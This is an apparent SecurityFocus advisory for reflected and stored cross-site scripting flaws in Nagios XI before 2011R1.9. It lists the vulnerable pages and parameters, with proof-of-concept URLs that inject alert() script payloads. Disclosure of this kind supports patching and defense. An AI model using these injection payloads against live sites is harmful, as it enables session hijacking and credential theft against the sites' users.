source: www.securityfocus.com/bid/51069/info Nagios XI is prone to an HTML injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. Successful exploits will allow attacker-supplied HTML and script code to run in the user's browser in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible. Nagios XI versions prior to 2011R1.9 are vulnerable, which indicates 2011R1.9 as the first release not affected. Reflected XSS ----- Page: /nagiosxi/login.php Variables: - PoCs: http://site/nagiosxi/login.php/";alert('0a29');" Details: The request URL, including any path info appended after the script name, is copied into the JavaScript variable 'backend_url' without encoding, so a double quote in the path ends the string literal and the text after it is treated as script. Also affects: /nagiosxi/about/index.php /nagiosxi/about/index.php /nagiosxi/about/main.php /nagiosxi/account/main.php /nagiosxi/account/notifymethods.php /nagiosxi/account/notifymsgs.php /nagiosxi/account/notifyprefs.php /nagiosxi/account/testnotification.php /nagiosxi/help/index.php /nagiosxi/help/main.php /nagiosxi/includes/components/alertstream/go.php /nagiosxi/includes/components/alertstream/index.php /nagiosxi/includes/components/hypermap_replay/index.php /nagiosxi/includes/components/massacknowledge/mass_ack.php /nagiosxi/includes/components/xicore/recurringdowntime.php/ /nagiosxi/includes/components/xicore/status.php /nagiosxi/includes/components/xicore/tac.php /nagiosxi/reports/alertheatmap.php /nagiosxi/reports/availability.php /nagiosxi/reports/eventlog.php /nagiosxi/reports/histogram.php /nagiosxi/reports/index.php /nagiosxi/reports/myreports.php /nagiosxi/reports/nagioscorereports.php /nagiosxi/reports/notifications.php /nagiosxi/reports/statehistory.php /nagiosxi/reports/topalertproducers.php /nagiosxi/views/index.php /nagiosxi/views/main.php Page: /nagiosxi/account/ Variables: xiwindow PoCs: http://site/nagiosxi/account/?xiwindow="></iframe><script>alert('0a29')</script> Page: 
/nagiosxi/includes/components/massacknowledge/mass_ack.php Variables: - PoCs: http://site/nagiosxi/includes/components/massacknowledge/mass_ack.php/'><script>alert("0a29")</script> Page: /nagiosxi/includes/components/xicore/status.php Variables: hostgroup, style PoCs: http://site/nagiosxi/includes/components/xicore/status.php?show=hostgroups&hostgroup='><script>alert("0a29")</script> http://site/nagiosxi/includes/components/xicore/status.php?show=hostgroups&hostgroup=all&style=><script>alert("0a29")</script> Page: /nagiosxi/includes/components/xicore/recurringdowntime.php Variables: - PoCs: http://site/nagiosxi/includes/components/xicore/recurringdowntime.php/';}}alert('0a29')</script> Page: /nagiosxi/reports/alertheatmap.php Variables: height, host, service, width PoCs: http://site/nagiosxi/reports/alertheatmap.php?height="><script>alert("0a29")</script> http://site/nagiosxi/reports/alertheatmap.php?host="><script>alert("0a29")</script> http://site/nagiosxi/reports/alertheatmap.php?service="><script>alert("0a29")</script> http://site/nagiosxi/reports/alertheatmap.php?width="><script>alert("0a29")</script> Page: /nagiosxi/reports/histogram.php Variable: service PoCs: http://site/nagiosxi/reports/histogram.php?service="><script>alert("0a29")</script> Page: /nagiosxi/reports/notifications.php Variables: host, service PoCs: http://site/nagiosxi/reports/notifications.php?host="><script>alert("0a29")</script> http://site/nagiosxi/reports/notifications.php?service="><script>alert("0a29")</script> Page: /nagiosxi/reports/statehistory.php Variables: host, service PoCs: http://site/nagiosxi/reports/statehistory.php?host="><script>alert("0a29")</script> http://site/nagiosxi/reports/statehistory.php?service="><script>alert("0a29")</script> Stored XSS ----- Page: /nagiosxi/reports/myreports.php Variable: title Details: A script payload can be stored in the title of a report saved under 'My Reports'; however, it is believed that the stored title is only viewable by the logged-in user. 1) View a report and save it, e.g. 
http://site/nagiosxi/reports/myreports.php?add=1&title=Availability+Summary&url=%2Fnagiosxi%2Freports%2Favailability.php&meta_s=a%3A0%3A%7B%7D 2) Enter a script payload as the report name, e.g. "><script>alert("0a29")</script>